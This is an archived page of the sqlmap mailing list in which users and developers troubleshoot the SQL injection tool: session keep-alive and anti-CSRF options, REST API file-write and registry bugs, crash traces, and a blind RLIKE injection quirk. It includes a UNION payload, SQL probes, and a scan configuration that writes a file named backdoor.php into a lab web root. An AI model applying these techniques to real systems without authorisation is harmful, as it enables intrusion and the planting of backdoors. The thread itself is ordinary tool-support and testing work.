sqlmap-users Mailing List for sqlmap (Page 13)
From: Miroslav S. <mir...@gm...> - 2015-04-20 20:26:13
Pushing the patch in a couple of hours.

Bye

On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...> wrote:
> Ah, good point. Hadn't thought about that. Also, requiring a POST request
> does make it difficult.

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2015-04-20 18:37:59
Ah, good point. Hadn't thought about that. Also, requiring a POST request does make it difficult.

On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...> wrote:
> I don't think the second-order option will work, as that is specifying where to
> look for injection results, which might result in your underlying injection
> failing if the results are not to be found there.
>
> There are, however, options in the latest version that appear to be for just this
> type of situation (although I personally haven't used them just yet):
>
>     --safe-url=SAFURL    URL address to visit frequently during testing
>     --safe-freq=SAFREQ   Test requests between two visits to a given safe URL
>
> I believe this will ensure your session remains active during the scan.
>
> There are also options for CSRF tokens to be snagged and parsed via:
>
>     --csrf-token=CSR..   Parameter used to hold anti-CSRF token
>     --csrf-url=CSRFURL   URL address to visit to extract anti-CSRF token
>
> in case the CSRF token needs to be refreshed for each injection (when
> injecting into forms and other typical POST injections and such).

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Johnathon D. <hoo...@gm...> - 2015-04-20 18:36:51
I don't think the second-order option will work, as that is specifying where to look for injection results, which might result in your underlying injection failing if the results are not to be found there.

There are, however, options in the latest version that appear to be for just this type of situation (although I personally haven't used them just yet):

    --safe-url=SAFURL    URL address to visit frequently during testing
    --safe-freq=SAFREQ   Test requests between two visits to a given safe URL

I believe this will ensure your session remains active during the scan.

There are also options for CSRF tokens to be snagged and parsed via:

    --csrf-token=CSR..   Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL   URL address to visit to extract anti-CSRF token

in case the CSRF token needs to be refreshed for each injection (when injecting into forms and other typical POST injections and such).

On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <bpe...@gm...> wrote:
> However, that being said, I have run into this before and had to write my
> own exploits to fully exploit the vulnerability.
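The request sequencing the two option pairs produce is easy to get wrong in one's head, so here is a small model of it as an added example (it is not sqlmap's code and not from this thread). The target application, its URLs under app.example, the "csrf" field name and the idle limit are all constructed for the demonstration. The model also shows the point the thread turns on: when the application only accepts a POST as a keep-alive, a GET to the safe URL does nothing.

```python
"""Model of --safe-url/--safe-freq and --csrf-url/--csrf-token sequencing.
Added example, not sqlmap's own code; the target, its URLs and the "csrf"
field name are constructed for the demonstration."""
import re

FORM_URL = "http://app.example/form"            # page carrying the anti-CSRF token
SEARCH_URL = "http://app.example/search"        # injectable POST endpoint
KEEPALIVE_URL = "http://app.example/keepalive"  # must be POSTed, as in the thread


class FakeApp:
    """Constructed target: drops the session after `idle_limit` ordinary
    requests unless /keepalive is POSTed, and rejects POSTs to /search that
    do not carry the current single-use anti-CSRF token."""

    def __init__(self, idle_limit=4):
        self.idle_limit = idle_limit
        self.idle = 0
        self.token = None
        self.counter = 0
        self.log = []            # (method, url) of every request, for inspection

    def request(self, method, url, data=None):
        self.log.append((method, url))
        if url == KEEPALIVE_URL:
            if method != "POST":
                return 405, "POST required"      # a GET keep-alive does nothing here
            self.idle = 0
            return 200, "session refreshed"
        self.idle += 1
        if self.idle > self.idle_limit:
            return 302, "redirect to /login"     # session expired
        if url == FORM_URL:
            self.counter += 1
            self.token = "tok%d" % self.counter
            return 200, '<form><input type="hidden" name="csrf" value="%s"></form>' % self.token
        if url == SEARCH_URL and method == "POST":
            if not self.token or (data or {}).get("csrf") != self.token:
                return 403, "bad or missing anti-CSRF token"
            self.token = None                    # token is single-use
            return 200, "results for %r" % data.get("q")
        return 404, ""


def extract_token(page, field_name):
    """Pull the value of the hidden input named `field_name` out of a page,
    which is what --csrf-token does with the page fetched from --csrf-url."""
    m = re.search(r'name="%s"\s+value="([^"]*)"' % re.escape(field_name), page)
    return m.group(1) if m else None


def run_tests(app, payloads, csrf_url=None, csrf_token=None,
              safe_url=None, safe_freq=0, safe_method="GET"):
    """Send one POST per payload with the same bookkeeping as the options:
    visit safe_url before the first test and again after every `safe_freq`
    tests; fetch csrf_url and copy the token into each request. Returns the
    HTTP status of every injected request."""
    statuses = []
    for sent, payload in enumerate(payloads):
        if safe_url and safe_freq and sent % safe_freq == 0:
            app.request(safe_method, safe_url)
        data = {"q": payload}
        if csrf_url and csrf_token:
            _, page = app.request("GET", csrf_url)
            data[csrf_token] = extract_token(page, csrf_token)
        code, _ = app.request("POST", SEARCH_URL, data)
        statuses.append(code)
    return statuses
```

With five payloads against an application that drops the session after four plain requests, the token-only run loses the session halfway through (the token fetch counts as a request too), a GET keep-alive changes nothing, and a POST keep-alive every two tests keeps all five injected requests at 200.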
From: Vojtěch P. <kr...@gm...> - 2015-04-20 18:34:41
Hi, thanks for the reply, but if I understand it right, I can supply only a URL to the second-order parameter. But I need to send a POST request.

Thank you very much,
Vojta

On 20.4.2015 20:22, Brandon Perry wrote:
> However, that being said, I have run into this before and had to write
> my own exploits to fully exploit the vulnerability.
From: Brandon P. <bpe...@gm...> - 2015-04-20 18:22:55
However, that being said, I have run into this before and had to write my own exploits to fully exploit the vulnerability.

On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <bpe...@gm...> wrote:
> There is a second-order parameter; it could be used to perform this. It
> would be requested after every injected request was sent.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2015-04-20 18:21:50
There is a second-order parameter; it could be used to perform this. It would be requested after every injected request was sent.

On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> wrote:
> Greetings,
> I am testing an application which I suspect logs me out if I don't
> send a certain POST request within a certain time interval.
> Is this possible to do with sqlmap? I know that there is a parameter
> which lets me run any Python code before every request. But it is not
> so nice, let's say.
> Is there any possibility to supply a POST request to safe-url? Is there
> anything like this planned?
> Thank you very much,
> Vojta

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Vojtěch P. <kr...@gm...> - 2015-04-20 18:18:15
Greetings,

I am testing an application which I suspect logs me out if I don't send a certain POST request within a certain time interval. Is this possible to do with sqlmap? I know that there is a parameter which lets me run any Python code before every request. But it is not so nice, let's say.

Is there any possibility to supply a POST request to safe-url? Is there anything like this planned?

Thank you very much,
Vojta
From: <na...@na...> - 2015-03-30 15:32:10
Hello sqlmap team,

I am Najeeb Choudhary from India. I have some issues using sqlmap v1-dev. I am trying to use a WAF script in sqlmap, just like a tamper script. If you could email me some example, it would be helpful for me.
From: Miroslav S. <mir...@gm...> - 2015-03-24 13:19:40
Yup. Pretty sure that this doesn't require "patching" :)

Bye

On Tue, Mar 24, 2015 at 1:36 PM, Brandon Perry <bpe...@gm...> wrote:
> Looks like someone typoed 'utf-8'...

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2015-03-24 12:37:04
Looks like someone typoed 'utf-8'...

On Mon, Mar 23, 2015 at 9:04 PM, Connor . <col...@gm...> wrote:
> [21:50:23] [WARNING] unknown web page charset 'urf-8'. Please report by
> e-mail to sql...@li... .

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Connor . <col...@gm...> - 2015-03-24 02:04:13
[21:50:23] [WARNING] unknown web page charset 'urf-8'. Please report by e-mail to sql...@li... .
From: Johnathon D. <hoo...@gm...> - 2015-03-20 13:24:14
Hey Guys,

I got things to about as good as I am going to get them for this Web GUI front end and have made things available to the public via my Github page for anyone interested; the project code can be found here:
https://github.com/Hood3dRob1n/SQLMAP-Web-GUI

I also made a relatively simple blog posting here:
http://kaoticcreations.blogspot.com/2015/03/sqlmap-web-gui.html

I do call out some concerns and to-do list items at the end of the blog, just my notes on where I personally would like to see things head a bit, as well as a small concern of mine over the use of pickling to pass options. I'm sure you will all be seeing more emails from me regarding those items in the future. If any questions, suggestions or other feedback, please let me know.

Thanks,
HR

PS - thank you very much SQLMAP development team for making this tool even possible and for the big help you provided me a few times during my development of this piece. Can't say enough nice things about you guys!
From: Miroslav S. <mir...@gm...> - 2015-03-11 22:49:28
Thank you for the report. Will try to check it tomorrow.

Bye

On Wed, Mar 11, 2015 at 10:54 PM, Johnathon Doe <hoo...@gm...> wrote:
> Hey SQLMAP Users,
>
> I am working on the finishing touches to a Web GUI using the API and lately have
> been working on incorporating the advanced attacks. This week I have been
> focusing on the Windows Registry options (read, write, & delete). In my
> testing I have noticed that all functions seem to be failing by default.
> Based on the errors it appears to be a lack of quoting of the full path to
> the batch file being used to run reg commands. As a result it fails to ever
> run the command, and thus no results return.
>
> My test machine is Windows 2003 Server, IIS + ASP + MS-SQL 2005.
>
> Now I have figured out my own workaround by patching the
> ./lib/takeover/registry.py file so that all instances of
> 'self._batPathRemote' being passed to evalCmd(), delRemoteFile(), or
> execCmd() are quoted when passed, like so: '"' + self._batPathRemote + '"'.
> This seems to resolve the issue and allow things to work when writing to
> locations with spaces in the path name.
>
> 1 - Is anyone else having this issue, or do you guys think this is target
> specific?
> 2 - Not sure how I submit for a fix if this is indeed a bug
> 3 - My patched registry.py: http://pastebin.com/fhVK0m6J
>
> Thanks,
> HR

--
Miroslav Stampar
http://about.me/stamparm
From: Johnathon D. <hoo...@gm...> - 2015-03-11 21:54:49
Hey SQLMAP Users,

I am working on the finishing touches to a Web GUI using the API and lately have been working on incorporating the advanced attacks. This week I have been focusing on the Windows Registry options (read, write, & delete). In my testing I have noticed that all functions seem to be failing by default. Based on the errors it appears to be a lack of quoting of the full path to the batch file being used to run reg commands. As a result it fails to ever run the command, and thus no results return.

My test machine is Windows 2003 Server, IIS + ASP + MS-SQL 2005.

Now I have figured out my own workaround by patching the ./lib/takeover/registry.py file so that all instances of 'self._batPathRemote' being passed to evalCmd(), delRemoteFile(), or execCmd() are quoted when passed, like so: '"' + self._batPathRemote + '"'. This seems to resolve the issue and allow things to work when writing to locations with spaces in the path name.

1 - Is anyone else having this issue, or do you guys think this is target specific?
2 - Not sure how I submit for a fix if this is indeed a bug
3 - My patched registry.py: http://pastebin.com/fhVK0m6J

Thanks,
HR
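The failure mode described above (an unquoted batch-file path that contains spaces being split into several arguments, so the wrong program is invoked) is easy to reproduce without a Windows box. The following is an added example, not sqlmap's code and not the pastebin patch: the path is made up, the argument splitter is an approximation of the Windows rules, and the quoting helper uses `subprocess.list2cmdline`, an undocumented but long-present CPython helper that implements the Microsoft C runtime quoting rules on every platform.

```python
"""Why an unquoted batch path with spaces breaks, and what quoting changes.
Added example, not sqlmap's code; paths are invented."""
import subprocess


def split_windows_cmdline(cmdline):
    """Approximate how the Windows C runtime turns a command line into argv:
    unquoted whitespace separates arguments, double quotes group text.
    Backslash-escaping of quotes is ignored, which is fine for file paths."""
    args, current, in_quotes = [], "", False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in " \t" and not in_quotes:
            if current:
                args.append(current)
                current = ""
        else:
            current += ch
    if current:
        args.append(current)
    return args


def quote_path(path):
    """Same effect as the thread's '"' + self._batPathRemote + '"' for paths
    with spaces, via the stdlib helper that implements the MS C runtime
    rules: quotes are added only when needed and embedded quotes escaped."""
    return subprocess.list2cmdline([path])


def program_that_runs(bat_path, quoted):
    """Return the executable the shell would actually try to start when the
    batch file is invoked with or without quoting of its path."""
    cmdline = quote_path(bat_path) if quoted else bat_path
    return split_windows_cmdline(cmdline)[0]
```

For `C:\Documents and Settings\Default User\reg_ops.bat` the unquoted form tries to start `C:\Documents` with the rest of the path as arguments, which is exactly the "command never runs, no results" symptom reported above; the quoted form starts the batch file. Quoting every remote path regardless of whether it contains spaces costs nothing, so the patch's unconditional quotes are the safer choice.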
From: Brandon P. <bpe...@gm...> - 2015-03-03 02:35:12
I think you meant to reply to the list. Take a look at the log and data endpoints, not just the log endpoint. Might give more information.

> On Mar 2, 2015, at 7:14 PM, Johnathon Doe <hoo...@gm...> wrote:
>
> Quick update: the proxy logs show sqlmap doing the verification step to confirm file size after the writing, so I think the API may be off a tad bit and failing to report back status properly.
>
>> On Mon, Mar 2, 2015 at 7:09 PM, Johnathon Doe <hoo...@gm...> wrote:
>>
>> OK, so I tested it through Burp to see what was going on. It is indeed writing the file and working successfully; however the API itself seems to be cutting off the log data or something odd is happening that I can't figure out.
>>
>> It also returns no status for the file write action in the scan data response array, so I have no way to really verify if things were successful or not other than possibly writing an additional HTTP GET request from the front end to check and confirm the new file exists. Seems like the API should report back status though and avoid that entirely. Any thoughts or ideas?
>>
>> Log snippet (check banner and try to write file):
>> ...
>> [INFO] [19:08:56] testing MySQL
>> [INFO] [19:08:56] confirming MySQL
>> [INFO] [19:08:56] the back-end DBMS is MySQL
>> [INFO] [19:08:56] fetching banner
>> [INFO] [19:08:57] fingerprinting the back-end DBMS operating system
>> [INFO] [19:08:57] the back-end DBMS operating system is Linux
>> [WARNING] [19:08:57] expect junk characters inside the file as a leftover from UNION query
>> => just stops here, seemingly cut off...
>>
>> And the full scan data response array:
>> Array
>> (
>>     [0] => Array
>>         (
>>             [status] => 1
>>             [type] => 0
>>             [value] => Array
>>                 (
>>                     [0] => Array
>>                         (
>>                             [dbms] => MySQL
>>                             [suffix] =>
>>                             [clause] => Array
>>                                 (
>>                                     [0] => 1
>>                                     [1] => 2
>>                                     [2] => 3
>>                                     [3] => 4
>>                                     [4] => 5
>>                                 )
>>                             [ptype] => 1
>>                             [dbms_version] =>
>>                             [prefix] =>
>>                             [place] => GET
>>                             [os] =>
>>                             [conf] => Array
>>                                 (
>>                                     [string] =>
>>                                     [notString] =>
>>                                     [titles] =>
>>                                     [regexp] =>
>>                                     [textOnly] =>
>>                                     [optimize] =>
>>                                 )
>>                             [parameter] => tainted_id
>>                             [data] => Array
>>                                 (
>>                                     [3] => Array
>>                                         (
>>                                             [comment] => #
>>                                             [matchRatio] => 0.303
>>                                             [title] => MySQL UNION query (NULL) - 1 to 10 columns
>>                                             [templatePayload] =>
>>                                             [vector] => Array
>>                                                 (
>>                                                     [0] => 3
>>                                                     [1] => 4
>>                                                     [2] => #
>>                                                     [3] =>
>>                                                     [4] =>
>>                                                     [5] => NULL
>>                                                     [6] => 1
>>                                                     [7] =>
>>                                                     [8] =>
>>                                                 )
>>                                             [where] => 1
>>                                             [payload] => tainted_id=01 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a7171,0x676a476a697a484a6442,0x716b627871)#&tainted_cost=10.00
>>                                         )
>>                                 )
>>                         )
>>                 )
>>         )
>>     [1] => Array
>>         (
>>             [status] => 1
>>             [type] => 2
>>             [value] => 5.0.95
>>         )
>> )
>>
>> Configuration Options Set for Scan:
>> Array
>> (
>>     [options] => Array
>>         (
>>             [osShell] =>
>>             [getUsers] =>
>>             [getPasswordHashes] =>
>>             [excludeSysDbs] =>
>>             [uChar] =>
>>             [regData] =>
>>             [cpuThrottle] => 5
>>             [prefix] =>
>>             [code] =>
>>             [googlePage] => 1
>>             [skip] =>
>>             [query] =>
>>             [randomAgent] => true
>>             [osPwn] =>
>>             [authType] =>
>>             [crawlDepth] =>
>>             [requestFile] =>
>>             [predictOutput] =>
>>             [wizard] =>
>>             [stopFail] =>
>>             [forms] =>
>>             [taskid] => 5033f157cc662932
>>             [pivotColumn] =>
>>             [dropSetCookie] =>
>>             [smart] =>
>>             [risk] => 2
>>             [sqlFile] =>
>>             [rParam] =>
>>             [getCurrentUser] =>
>>             [notString] =>
>>             [getRoles] =>
>>             [getPrivileges] =>
>>             [testParameter] =>
>>             [tbl] =>
>>             [charset] =>
>>             [trafficFile] =>
>>             [osSmb] =>
>>             [level] => 3
>>             [secondOrder] =>
>>             [outputDir] =>
>>             [timeout] => 30
>>             [firstChar] =>
>>             [torPort] =>
>>             [regRead] =>
>>             [binaryFields] =>
>>             [checkTor] =>
>>             [commonTables] =>
>>             [direct] =>
>>             [saFreq] => 0
>>             [tmpPath] =>
>>             [titles] =>
>>             [getSchema] =>
>>             [identifyWaf] =>
>>             [paramDel] =>
>>             [regKey] =>
>>             [limitStart] =>
>>             [flushSession] =>
>>             [loadCookies] =>
>>             [dnsName] =>
>>             [csvDel] => ,
>>             [method] => GET
>>             [osBof] =>
>>             [invalidLogical] =>
>>             [getCurrentDb] =>
>>             [hexConvert] =>
>>             [proxyFile] =>
>>             [answers] =>
>>             [host] =>
>>             [dependencies] =>
>>             [cookie] =>
>>             [proxy] => http://127.0.0.1:8080
>>             [regType] =>
>>             [optimize] =>
>>             [limitStop] =>
>>             [mnemonics] =>
>>             [uFrom] =>
>>             [noCast] =>
>>             [testFilter] =>
>>             [eta] =>
>>             [csrfToken] =>
>>             [threads] => 1
>>             [logFile] =>
>>             [os] =>
>>             [col] =>
>>             [rFile] =>
>>             [proxyCred] =>
>>             [verbose] => 1
>>             [isDba] =>
>>             [updateAll] =>
>>             [privEsc] =>
>>             [forceDns] =>
>>             [getAll] =>
>>             [api] => 1
>>             [url] => http://192.168.1.10/training/sqli/sqli1.php?tainted_id=01&tainted_cost=10.00
>>             [invalidBignum] =>
>>             [regexp] =>
>>             [getDbs] =>
>>             [freshQueries] =>
>>             [uCols] =>
>>             [smokeTest] =>
>>             [wFile] => /tmp/backdoor.php
>>             [udfInject] =>
>>             [invalidString] =>
>>             [tor] =>
>>             [forceSSL] =>
>>             [ignore401] =>
>>             [beep] =>
>>             [saveCmdline] =>
>>             [configFile] =>
>>             [scope] =>
>>             [dumpAll] =>
>>             [torType] => HTTP
>>             [regVal] =>
>>             [dummy] =>
>>             [search] =>
>>             [skipUrlEncode] =>
>>             [referer] =>
>>             [liveTest] =>
>>             [purgeOutput] =>
>>             [retries] => 3
>>             [authPrivate] =>
>>             [extensiveFp] =>
>>             [dumpTable] =>
>>             [database] => /tmp/sqlmapipc-xZHnRg
>>             [batch] => 1
>>             [headers] =>
>>             [authCred] =>
>>             [osCmd] =>
>>             [suffix] =>
>>             [dbmsCred] =>
>>             [regDel] =>
>>             [shLib] =>
>>             [sitemapUrl] =>
>>             [timeSec] => 5
>>             [msfPath] =>
>>             [noEscape] =>
>>             [getHostname] =>
>>             [sessionFile] =>
>>             [disableColoring] => 1
>>             [getTables] =>
>>             [agent] =>
>>             [lastChar] =>
>>             [string] =>
>>             [dbms] =>
>>             [dumpWhere] =>
>>             [tamper] =>
>>             [hpp] =>
>>             [runCase] =>
>>             [delay] => 0
>>             [evalCode] =>
>>             [cleanup] =>
>>             [csrfUrl] =>
>>             [getBanner] => true
>>             [profile] =>
>>             [getComments] =>
>>             [bulkFile] =>
>>             [safUrl] =>
>>             [db] =>
>>             [excludeCol] =>
>>             [dumpFormat] => CSV
>>             [alert] =>
>>             [nullConnection] =>
>>             [user] =>
>>             [parseErrors] =>
>>             [getCount] =>
>>             [dFile] => /var/www/html/images/69.php
>>             [data] =>
>>             [regAdd] =>
>>             [ignoreProxy] =>
>>             [getColumns] =>
>>             [mobile] =>
>>             [googleDork] =>
>>             [sqlShell] =>
>>             [pageRank] =>
>>             [tech] => U
>>             [textOnly] =>
>>             [cookieDel] =>
>>             [commonColumns] =>
>>             [keepAlive] =>
>>         )
>>     [success] => 1
>> )
>>
>>> On Mon, Mar 2, 2015 at 6:32 PM, Johnathon Doe <hoo...@gm...> wrote:
>>>
>>> For some reason I hadn't thought of that, that is a great idea! Will report back in a bit....
From: Brandon P. <bpe...@gm...> - 2015-03-03 00:25:07
|
Can you set the proxy argument to go through Burp Suite to see exactly what sqlmap is sending when those options are set?

Sent from a phone

> On Mar 2, 2015, at 6:21 PM, Johnathon Doe <hoo...@gm...> wrote:
>
> I am working on a PHP front-end to leverage the REST API to drive functionality, having some issues working in a few of the advanced features - mostly file write. I was wondering if anyone could verify that the wFile & dFile config options, when set, will trigger a file write action.
>
> I have managed to get the osCmd option to successfully write a file to the target, but I can't seem to get the normal --file-write --file-dest options to work. The osCmd option generally takes me passing in the prompt answers via the answer configuration option.
>
> I assumed if I set the values for the wFile & dFile options it would trigger the file write, but nothing seems to be happening. I dump the list of options currently configured and it shows both options set with proper paths (same ones that work when provided to osCmd via answers to prompt). The logs don't show any errors and it just seems to end right where I would expect it to try the file writing. Is there a third option that needs to be set that I am perhaps missing? Any help you guys can provide is greatly appreciated!
>
> Also note: when I put in a bad path (just to test), it does seem to trigger the error for finding local file (wFile) so it's doing something with these variables, but still seems like I'm missing something....
>
> Thanks,
> HR
|
From: Johnathon D. <hoo...@gm...> - 2015-03-03 00:21:54
|
I am working on a PHP front-end to leverage the REST API to drive functionality, having some issues working in a few of the advanced features - mostly file write. I was wondering if anyone could verify that the wFile & dFile config options, when set, will trigger a file write action.

I have managed to get the osCmd option to successfully write a file to the target, but I can't seem to get the normal --file-write --file-dest options to work. The osCmd option generally takes me passing in the prompt answers via the answer configuration option.

I assumed if I set the values for the wFile & dFile options it would trigger the file write, but nothing seems to be happening. I dump the list of options currently configured and it shows both options set with proper paths (same ones that work when provided to osCmd via answers to prompt). The logs don't show any errors and it just seems to end right where I would expect it to try the file writing. Is there a third option that needs to be set that I am perhaps missing? Any help you guys can provide is greatly appreciated!

Also note: when I put in a bad path (just to test), it does seem to trigger the error for finding local file (wFile) so it's doing something with these variables, but still seems like I'm missing something....

Thanks,
HR
|
From: Miroslav S. <mir...@gm...> - 2015-02-26 14:44:31
|
Hi.

Can you please contact me back privately with the details of the url? There is something strange going on here. In any case, not able to reproduce nor find what would be the cause of this behavior.

Bye

On Mon, Feb 23, 2015 at 4:51 AM, Nemo Slapz <n3m...@gm...> wrote:
> [19:47:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u **************************************
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap", line 95, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 364, in start
>     if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
>   File "/usr/share/sqlmap/lib/controller/checks.py", line 1213, in checkConnection
>     page, _ = Request.queryPage(content=True, noteResponseTime=False)
>   File "/usr/share/sqlmap/lib/request/connect.py", line 894, in queryPage
>     page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "/usr/share/sqlmap/lib/request/connect.py", line 386, in getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
>     return _opener.open(url, data, timeout)
>   File "/usr/lib/python2.7/urllib2.py", line 401, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.7/urllib2.py", line 419, in _open
>     '_open', req)
>   File "/usr/lib/python2.7/urllib2.py", line 379, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.7/urllib2.py", line 1211, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.7/urllib2.py", line 1178, in do_open
>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>   File "/usr/lib/python2.7/httplib.py", line 962, in request
>     self._send_request(method, url, body, headers)
>   File "/usr/lib/python2.7/httplib.py", line 996, in _send_request
>     self.endheaders(body)
>   File "/usr/lib/python2.7/httplib.py", line 958, in endheaders
>     self._send_output(message_body)
>   File "/usr/lib/python2.7/httplib.py", line 818, in _send_output
>     self.send(msg)
>   File "/usr/lib/python2.7/httplib.py", line 780, in send
>     self.connect()
>   File "/usr/lib/python2.7/httplib.py", line 761, in connect
>     self.timeout, self.source_address)
>   File "/usr/lib/python2.7/socket.py", line 564, in create_connection
>     sock.connect(sa)
> AttributeError: '_socketobject' object has no attribute 'connect'

--
Miroslav Stampar
http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2015-02-26 14:33:36
|
Looks like a false positive. Please rerun with --flush-session.

Bye

On Sun, Feb 22, 2015 at 6:41 AM, Bruno Ferreira <ch...@ch...> wrote:
> Hello everyone,
>
> I just started using sqlmap and it detects basic stuff fine so far (database, operating system, PHP version, ...) but when it comes to retrieving information I get a lot of garbage that I can't make sense of. An example of this 'garbage text' can be seen in the attached screenshot.
>
> For those wondering, this is for a security challenge (that is one of many things that happened as part of the computer science week in the university) and my final goal is to be able to list files in the server (and if they are out of the www folder, I should still be able to read them somehow).
>
> But my question is about all those strange characters that can be seen in the attached picture and how to convert them to something useful.
>
> Thank you,
> Bruno Ferreira

--
Miroslav Stampar
http://about.me/stamparm
|
From: Nemo S. <n3m...@gm...> - 2015-02-23 03:51:37
|
[19:47:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u **************************************
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap", line 95, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 364, in start
    if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
  File "/usr/share/sqlmap/lib/controller/checks.py", line 1213, in checkConnection
    page, _ = Request.queryPage(content=True, noteResponseTime=False)
  File "/usr/share/sqlmap/lib/request/connect.py", line 894, in queryPage
    page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/usr/share/sqlmap/lib/request/connect.py", line 386, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 401, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 419, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 379, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1211, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1178, in do_open
    h.request(req.get_method(), req.get_selector(), req.data, headers)
  File "/usr/lib/python2.7/httplib.py", line 962, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib/python2.7/httplib.py", line 996, in _send_request
    self.endheaders(body)
  File "/usr/lib/python2.7/httplib.py", line 958, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 818, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 780, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 761, in connect
    self.timeout, self.source_address)
  File "/usr/lib/python2.7/socket.py", line 564, in create_connection
    sock.connect(sa)
AttributeError: '_socketobject' object has no attribute 'connect'
|
From: Bruno F. <ch...@ch...> - 2015-02-22 19:06:17
|
Hello again,

I found the problem. The SQL injection parameter that I found was a false positive and the output of the page was random and unrelated to the injected values. The 'garbage' I got was the product of that randomness.

Regards,
Bruno Ferreira

2015-02-22 14:40 GMT+00:00 Bruno Ferreira <ch...@ch...>:
> Hello everyone,
>
> I just started using sqlmap and it detects basic stuff fine so far (database, operating system, PHP version, ...) but when it comes to retrieving information I get a lot of garbage that I can't make sense of. An example of this 'garbage text' can be seen in the attached screenshot.
>
> For those wondering, this is for a security challenge (that is one of many things that happened as part of the computer science week in the university) and my final goal is to be able to list files in the server (and if they are out of the www folder, I should still be able to read them somehow).
>
> But my question is about all those strange characters that can be seen in the attached picture and how to convert them to something useful.
>
> Thank you.
>
> Bruno Ferreira
|
From: Brandon P. <bpe...@gm...> - 2015-02-22 15:14:26
|
BTW I hope this doesn't come across as it being a problem with sqlmap, I think it is a problem with the local system's mysql instance, just trying to figure out why an RLIKE injection would allow enumeration of DATABASE() but not from the users table. I figured I would ask this list if anyone else had experienced similar, though.

'admin' is the only user in the database, so I know it is the only row that could be returned, but order by presents the same results...

mysql> select ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1));
+----------------------------------------------------------------+
| ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) |
+----------------------------------------------------------------+
|                                                             97 |
+----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)

Might just need to say it is some quirk on the exploitable system's MySQL instance... It's a little bizarre.

mysql  Ver 14.14 Distrib 5.6.19, for Linux (x86_64) using  EditLine wrapper

> On Feb 22, 2015, at 7:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi again.
>
> I believe that we have a problem here. I am trying to reproduce your "problem" and can't do it:
>
> mysql> select * from users;
> +----+--------+----------------------------------+
> | id | name   | surname                          |
> +----+--------+----------------------------------+
> |  1 | admin  | blissett                         |
> |  2 | fluffy | bunny                            |
> |  3 | wu     | ming                             |
> |  4 | NULL   | nameisnull                       |
> |  5 | md5    | 098f6bcd4621d373cade4e832627b4f6 |
> +----+--------+----------------------------------+
> 5 rows in set (0.00 sec)
>
